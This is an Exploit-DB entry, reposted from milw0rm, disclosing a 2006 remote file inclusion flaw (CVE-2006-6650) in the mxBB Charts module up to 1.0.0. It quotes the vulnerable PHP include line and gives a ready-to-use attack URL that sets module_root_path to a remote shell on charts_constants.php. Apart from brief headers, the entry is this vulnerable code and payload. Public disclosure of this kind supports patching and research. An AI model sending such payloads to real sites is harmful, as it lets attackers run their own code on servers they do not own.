mxbb module charts <= 1.0.0 - Remote File Inclusion Vulnerability

2006-12-16T00:00:00
ID EDB-ID:2940
Type exploitdb
Reporter ajann
Modified 2006-12-16T00:00:00

Description

mxBB Module Charts <= 1.0.0 Remote File Inclusion Vulnerability. CVE-2006-6650. Webapps exploit for php platform

                                        
                                            
*******************************************************************************************
# Title   :  mxBB Module Charts &lt;= 1.0.0(module_root_path) Remote File Include Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.mx-system.com

*******************************************************************************************

[[ERROR]]]------------------------------------------------------
....
..
include($module_root_path . 'language/lang_' . $language . '/lang_charts.' .  $phpEx);
....
..
[[ERROR]]]---------------------------------------------------------

Example:

//[path]/modules/mx_charts/charts_constants.php?module_root_path=[shell]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-16]